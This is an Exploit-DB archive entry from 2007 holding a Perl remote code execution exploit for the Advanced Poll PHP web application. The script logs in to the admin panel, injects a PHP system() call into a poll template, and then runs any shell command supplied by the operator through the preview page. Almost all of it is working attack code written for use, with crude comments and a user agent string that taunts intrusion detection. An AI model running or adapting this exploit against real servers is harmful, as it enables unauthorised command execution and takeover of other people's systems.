Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit

2007-02-13T00:00:00
ID EDB-ID:3300
Type exploitdb
Reporter diwou
Modified 2007-02-13T00:00:00

Description

Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl -w
# Advanced Poll 2.0.0 &gt;= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
# 
# diwou &lt;diwou@phucksys.org&gt;
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'
# url: http|https://tatget:(port)/phppoll/
#

die("RTFC! ;)") unless(@ARGV&gt;1);

my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);

my %ipost=
(
	poll_tplset =&gt; 'default',
	'tpl[display_head.html]' =&gt;
&lt;&lt;HEAD
\\".system(getenv(HTTP_PHP)).exit().\\"
&lt;table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars[bgcolor_fr]"&gt;
  &lt;tr align="center"&gt;
    &lt;td&gt;&lt;style type="text/css"&gt;
       &lt;!--
        .input { font-family: \$pollvars[font_face]; font-size: 8pt}
        .links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]}
       --&gt;
      &lt;/style&gt;&lt;font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"&gt;&lt;b&gt;\$pollvars[title]&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr align="center"&gt;
    &lt;td&gt;
      &lt;table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]"&gt;
        &lt;tr&gt;
          &lt;td height="40" valign="middle"&gt;&lt;font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"&gt;&lt;b&gt;\$question&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr align="right" valign="top"&gt;
          &lt;td&gt;
            &lt;form method="post" action="\$this-&gt;form_forward"&gt;
            &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
              &lt;tr valign="top" align="center"&gt;
                &lt;td&gt;
                  &lt;table width="100%" border="0" cellspacing="0" cellpadding="1" align="center"&gt;
HEAD
,
	action   =&gt;  '',
	tplset   =&gt;  'default',
	tpl_type =&gt;  'display',
	session  =&gt;  '',
	uid      =&gt;  1
);

my %epost=
(
	session    =&gt; '',
	uid        =&gt; 1,
	poll_tplst =&gt; 'default',
	tpl_type   =&gt; 'display',
);

my %zday=
(
	username =&gt; 'jakahw4nk4h',
	'pollvars[poll_username]' =&gt; 'jakahw4nk4h',
	password =&gt; 'fuckoff',
	'pollvars[poll_password]' =&gt; ''
);

$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

$lwp=new LWP::UserAgent();
$lwp-&gt;agent($agent);
$lwp-&gt;timeout(10);
$lwp-&gt;protocols_allowed(['http','https']);

if($ENV{PROXY})
{
	$lwp-&gt;proxy(['http','https'],$ENV{PROXY});
	print "Using proxy ".$ENV{PROXY}."\n";
}

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Doing some pretty with ".$url."...\n\n";

print "+ generating session...\n";
$out=$lwp-&gt;post($url,\%zday)-&gt;content();
if($out=~ /index\.php\?session=((.){32})/)
{
	$ipost{'session'}=$epost{'session'}=$1;
	print "  session: ".$ipost{'session'}."\n";
	
	$url=~s/index\.php/admin_templates\.php/g;
	print "+ injecting diplay_head.html template...\n";
	$out=$lwp-&gt;post($url,\%ipost)-&gt;content();
	$epost{'action'}=$1 if($out=~ /&lt;input type="submit" name="action" value="(.*)" class="button"&gt;/);
	print "  button: ".$epost{'action'}."\n";

	$url=~s/admin_templates\.php/admin_preview\.php/g;
	print "+ executing...\n";
	$out=$lwp-&gt;post($url,\%epost,PHP =&gt; "echo BOCE;".$cmd.";echo EOCE")-&gt;content();

	print "-- BOCE --\n";
	foreach $out (split(/\n/,$out))
	{
		$res=1,next if($out=~/BOCE/);
		$res=0,next if($out=~/EOCE/);
		print $out."\n" if($res);
	}
	print "-- EOCE --\n";
}
else
{
	print "don't worry, u can improve me! eh eh eh :D?\n";
}

sub md5
{
	$_=new MD5;
	$_-&gt;add(@_);
	return unpack("H*",$_-&gt;digest());
}

# milw0rm.com [2007-02-13]